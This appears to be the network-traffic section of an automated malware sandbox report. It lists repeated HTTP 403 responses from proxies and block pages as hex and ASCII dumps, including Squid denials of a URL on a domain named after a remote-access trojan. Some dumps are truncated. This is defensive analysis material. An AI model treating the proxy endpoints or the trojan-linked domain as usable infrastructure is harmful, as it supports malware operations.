Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:34 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:34 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closeContent-Type: text/htmlCache-Control: no-cacheX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Length: 4872Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 38 3b 20 49 45 3d 45 44 47 45 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 61 36 61 36 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 69 6d 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 75 72 6c 5d 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 36 32 36 32 36 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:34 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:35 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:35 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
